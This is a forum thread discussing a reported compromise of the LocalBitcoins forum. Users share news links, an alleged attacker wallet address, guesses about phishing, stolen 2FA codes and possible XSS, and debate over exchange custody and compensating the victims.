Bitcoin Forum

Typing this on mobile right now. Just saw this on Reddit.

Thread:

https://www.reddit.com/r/Bitcoin/comments/ajzym3/psa_localbitcoinscom_compromised_do_not_attempt/

For now we currently have little to no information about what happened/what's happening.

---

EDIT: Currently not confirmed, but the hackers wallet was said to be this address: 13WaahhsiGph4ysmQtjVhVTdgQUSL62KJr (https://www.blockchain.com/btc/address/13WaahhsiGph4ysmQtjVhVTdgQUSL62KJr)

7.95205862 BTC was sent to this address as of this moment.

---

EDIT #2: Still no announcement from LocalBitcoins as of now. Will be editing the title of this thread after the things clear up.

https://twitter.com/LocalBitcoins

---

EDIT #3 Finally an update from LocalBitcoins. Edited the topic title.


https://www.reddit.com/r/localbitcoins/comments/ak1u8m/localbitcoins_report_on_the_security/

Reports of lots of coin loss are surfacing. No official update on their twitter as of yet - https://twitter.com/LocalBitcoins

Forum has been disabled. Here we go again.

another exchanges attack. Bitcoin may be vulnerable from.decrypting but its exchanges are not safe and it is vulnerable from hijacking or hacking it from someone. The problem now starts when a user has stored some of its crypto in the exchanges. Probably you will going to wake up one day losing all the crypto in the exchange wallet.

From the look of it, there have been few reports and the damage is not that big (or still not reported from the users yet). If that's the case and the team is as professional as they claim to be, they should reimburse the users. Just another reason on why you shouldn't keep your funds in exchanges by the way.

From the looks of it based on the discussions, it seems like the forum-side of LocalBitcoins was compromised and the hacker is using the login to phish the forum accounts, for the hacker to be able to withdraw the funds of the users. Hopefully it stopped here as the forum has been disabled. Not 100% sure though.

How long will this go on? Another cryptocurrency exchange has been cracked. Phishing, one of the most experienced viruses. I hope the team of the LOCALBITCOINS project will do everything to ensure that the cryptocurrency remains with the owners

Not surprising, every year they hack the exchanges, just recently there was information about breaking into large crypto exchanges and selling verified user documents

https://www.ccn.com/hacked-customer-data-from-world-leading-cryptocurrency-exchanges-for-sale-on-the-dark-web/

How do you not understand that to keep money even in the bank is unsafe and especially on the exchanges

My advice to you is to keep your cryptocurrency in cold wallets on your computer and this will not protect you from hacking by 100%

In my opinion this is the safest place

As long as exchanges are around, hacks will happen whether we like it or not.

---

Update: edited the topic to include the message from LocalBitcoins.

Looks like localbitcoins managed to shut this down pretty quickly after it started up actually, but the hackers still managed to make off with just shy of 8 BTC ($28,000) from 5 users (assuming that 1 address is the only address they used). Wonder if localbitcoins will compensate the users affected?

Once again, we have to wonder why users keep leaving large amount of funds on exchanges. Say it with me now: Not your keys, not your bitcoin. Not your keys, not your bitcoin. Not your keys, not your bitcoin. Not your keys, not your bitcoin.

Localbitcoins.com was one among the best platform that has got its service around the world. Quite often bitcoin fraudulent activities happen through localbitcoins. This time the same has taken place in large scale as more and more hackers have focused over the cryptocurrency network. Two year back I lost through a hack that was completely because of not enabling two factor authentication.

wow this is pretty scary, was it the first time happening???

I like localbitcoin and always thought its a pretty good site, not that fancy but usability is totally there

I hope more safe system will be in place to avoid this kind of scary hacks

They should just compensate the stolen bitcoin in my opinion. While 8 BTC is definitely a lot for me, it's probably not that much for them when taking into account how much they're potentially earning. Compensating the stolen BTC would be a great PR move too.

It's the first time for LocalBitcoins as far as I know. In the hackers point of view, getting past LocalBitcoins itself is probably difficult, hence the attacker went for the weaker link: the forum software. Correct me if I'm wrong, but the LocalBitcoins exchange itself and the LocalBitcoins forum has accounts that are connected; so the attacker took advantage of this. Quite smart really.

I once said that you need to store Bitcoin, namely, you knew about your cold wallets, but you used other exchanges.

This was a man-in-the-middle type attack on individual users' accounts, stealing their 2FA keys via the forum to log in to their LBC accounts and transfer out their funds. There was no hack on the main LBC wallets or databases, so your personal information won't be affected. I would encourage everyone, however, to think twice before performing KYC with any service online. Just because your documents weren't accessed with this attack, doesn't mean they won't be accessed in the future.


According to this reddit post (https://www.reddit.com/r/localbitcoins/comments/ajzyow/psa_localbitcoinscom_compromised_do_not_attempt/ef0t31g/?context=2), one of the affected users has already had his lost balance reimbursed.

You can't expect everything to be stored in cold wallets. They stole a very small number of coins and as long as the loss is small it can be reimbursed and won't affect the business that much. If you have 1000 Bitcoin on your platform it's natural that up to 10% will be in hot wallets but some businesses like that Korean exchange that was hacked had all of their money in hot wallets.

These hackers are becoming very sophisticated, i wouldn't be surprised if it was the same team behind the electrum wallet hack as it follows the same pattern of phishing for login details. Bad day for bitcoiners as localbitcoins is a good website

Are there any more details about this third party software and what the vulnerability was exactly?

I read a couple articles about the attack and I was led to believe this was a DNS spoofing attack on the forum subdomain. It sounds like that's not actually the case?


Glad to hear it. If the losses were really limited to 8 BTC, they should just compensate the victims out of goodwill.

Typical... you know that those bitcoins are in an Exchange because users want/need to trade right? (Apparently, obviously, surely, most of them got their "own" wallet)
You can't easily use a Cold wallet that was buried 20-feet under a random area guided with a "X" on a map to buy a HYPEd shitcoin before it get pumped.

I'm afraid that keeping most of the coins in a hot/cold wallet not possible for someone who's day trading. Personally, I prefer keeping higher exchange balance than in cold wallet since highly-priced orders yield higher profit.
Specially now that the price is on its (*typo edit) best buy, predictable low-liqudity and mostly everyone is expecting a rise.

Usually, it goes like this:
Source (ex.Mining)---→(HotWallet)--→EXCHANGE---(Mixer)---→Cold Wallet (Savings)
Other Sources-------⤴---------------⤴                 ↪-----→Hot Wallet  (Expenses)

Fortunately, legitimate exchanges today are heavily regulated and problems such as missing funds can be legally resolved.

I don't think they have given specific information about this matter as of now, but I don't think it's a DNS attack. But for what it looks like in my opinion, I'm personally leaning more on a javascript/XSS injection on the forum software. Probably omething like:

User visits forum --> script executes --> probably redirects the user to a phishing site(?)

Just my rough guess.

Thanks for letting us know. I actually had no idea of this until I came across this thread.

It's really a bit surprising to me though how small of an amount has actually been compromised, when an entire forum has been breached into. I wouldn't doubt if the hacker has held onto some account details which at the time did not have any funds in them, because just 6 cases seems to be way too small

Even if you didn't sign into the forum during this time it's probably best to be safe, change your password and enable 2FA if you haven't already. It's a good thing that LBC is taking responsibility it seems and refunding people, which is at least professional on their part.


Don't think it's the first time that LBC has given us a scare. I remember back in the days it used to be down every once in a while and people would panic. Small hacks had happened a few years back as well.

Of course there will be compensation. It's not the users fault that the company's vault was robbed by thief.
 If a thief robs a bank, breaks the bank vault and steal people gold/jewelry, the bank are responsible for keeping the gold safe and will definitely compensate the owners.

I don't think doing that would be of any benefit to the hacker. The whole point of this attack was that it was stealing 2FA codes via the forum and using them to log in to exchange accounts. Keeping username and passwords would be no use unless the hacker had another way of stealing 2FA codes.


A bank is regulated and insured. Many crypto exchanges are not. Of course they should compensate the losses, but there have been many hacks in the past that haven't. It's by no means guaranteed.

The example you gave really doesn't apply with bitcoin/cryptocurrency exchanges, also as reasoned out by o_e_l_e_o. From all the exchanges that got hacked since the rise of bitcoin and cryptocurrencies in general, has every single exchange compensated their users of the stolen funds? No. Most, if not all went bankrupt instead.